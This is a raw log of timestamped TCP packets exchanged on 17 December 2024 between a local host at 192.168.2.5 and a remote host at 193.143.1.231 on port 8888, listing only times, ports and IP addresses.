Dec 17, 2024 15:16:15.441575050 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.441637993 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.445084095 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.445285082 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.445348024 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.448807001 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.449002981 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.449069023 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.452697039 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.495688915 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.555105925 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.555351973 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.555510998 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.556596994 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.556843996 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.556905031 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.561907053 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.562228918 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.562294006 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.565402031 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.565510988 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.565567970 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.567584038 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.567738056 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.567796946 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.569686890 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.569852114 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.569912910 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.572025061 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.572199106 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.572258949 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.573647022 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.573873997 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.573936939 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.576276064 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.576466084 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.576522112 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.578979969 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.579206944 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.579273939 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.584498882 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.584536076 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.584681034 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.585355043 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.585555077 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.585632086 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.587970018 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.588129997 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.588192940 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.589720011 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.590426922 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.590488911 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.592134953 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.592324018 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:16:15.592386007 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.594750881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.594948053 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.595004082 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.597434044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.597587109 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.597646952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.600071907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.600286961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.600349903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.602643967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.602829933 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.602890968 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.605324984 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.605555058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.605679035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.607980013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.608084917 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.608145952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.610474110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.610671043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.610743999 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.613261938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.613466978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.613528013 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.615756989 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.615958929 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.616015911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.618561983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.618680000 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.618737936 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.621028900 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.621233940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.621294975 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.623647928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.623847961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.623909950 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.626342058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.626513004 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.626574993 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.628978968 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.629122972 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.629189014 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.631608009 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.631799936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.631870985 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.634210110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.634357929 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.634437084 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.636826992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.637012959 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.637073040 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.639529943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.639666080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.639729977 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.642083883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.642261028 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.642327070 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.644893885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.645116091 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.645183086 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.647382021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.647552013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.647610903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.746820927 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.746934891 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.747003078 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.747838974 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.748018026 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.748079062 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.749557018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.749759912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.749820948 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.751697063 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.751871109 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.751929045 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.753906012 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.754103899 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.754164934 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.756161928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.756341934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.756400108 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.758125067 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.758294106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.758357048 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.760313034 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.760526896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.760590076 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.762233019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.762435913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.762495041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.764204979 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.764419079 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.764492035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.766186953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.766379118 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.766438007 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.768177986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.768357038 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.768419027 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.770117998 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.770306110 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.770366907 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.771995068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.772200108 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.772262096 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.773917913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.774090052 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.774148941 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.775789022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.775988102 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.776046038 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.777697086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.777879953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.777937889 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.779612064 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.779838085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.779906988 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.781466007 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.781666040 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.781725883 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.783373117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.783544064 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.783606052 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.785265923 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.785470963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.785531044 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.787241936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.787453890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.787513971 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.789199114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.789347887 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.789408922 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.790958881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.791169882 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.791229963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.792917967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.793217897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.793277025 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.794836044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.795032978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.795092106 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.796637058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.796808958 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.796870947 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.798640966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.798795938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.798854113 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.800589085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.800729036 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.800786972 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.802284002 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.802486897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.802546978 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.804199934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.804390907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.804450989 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.806119919 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.806334019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.806392908 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.807987928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.808167934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.808226109 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.809959888 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.810086966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.810147047 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.811779022 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.811990976 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.812050104 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.813652992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.813848019 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.813906908 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.815587997 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.815769911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.815828085 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.817440033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.817634106 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.817692041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.819341898 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.819514990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.819571972 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.821261883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.821491957 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.821552038 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.823251963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.823394060 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.823451996 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.825247049 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.825460911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.825520039 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.827076912 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.827282906 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.827353001 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.828809977 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.829006910 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.829070091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.830689907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.830883026 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.830940962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.832690001 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.832880974 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.832938910 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.834927082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.835091114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.835149050 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.836534023 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.836719990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.836777925 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.838279963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.838438988 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.838495970 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.840251923 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.840396881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.840456963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.842056990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.842235088 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.842295885 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.843950033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.844130993 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.844189882 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.938777924 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.938949108 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939032078 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.939517021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939740896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.939805031 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.942533970 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.942684889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.942744017 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.942960978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.943378925 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.943444014 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.943649054 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.944803953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.944864035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.944993973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.946424961 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.946491003 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.946578979 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.947886944 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.947946072 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.948002100 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.949440956 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.949505091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.949593067 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.950858116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.950927019 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.950998068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.952310085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.952373981 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.952481031 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.953761101 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.953820944 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.953877926 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.955275059 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.955348969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.955424070 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.956614971 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.956675053 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.956814051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.958058119 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.958117962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.958215952 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.959435940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.959496975 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.959553003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.960882902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.960943937 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.961031914 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.962187052 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.962248087 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.962333918 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.963515043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.963572979 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.963669062 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.964951992 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.965013027 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.965136051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.966195107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.966254950 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.966386080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.967569113 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.967628956 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.967731953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.968883991 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.968943119 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.969029903 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.970227003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.970288992 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.970393896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.971524000 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.971584082 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.971672058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.972922087 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.972984076 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.973071098 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.974153042 CET888849709193.143.1.231192.168.2.5
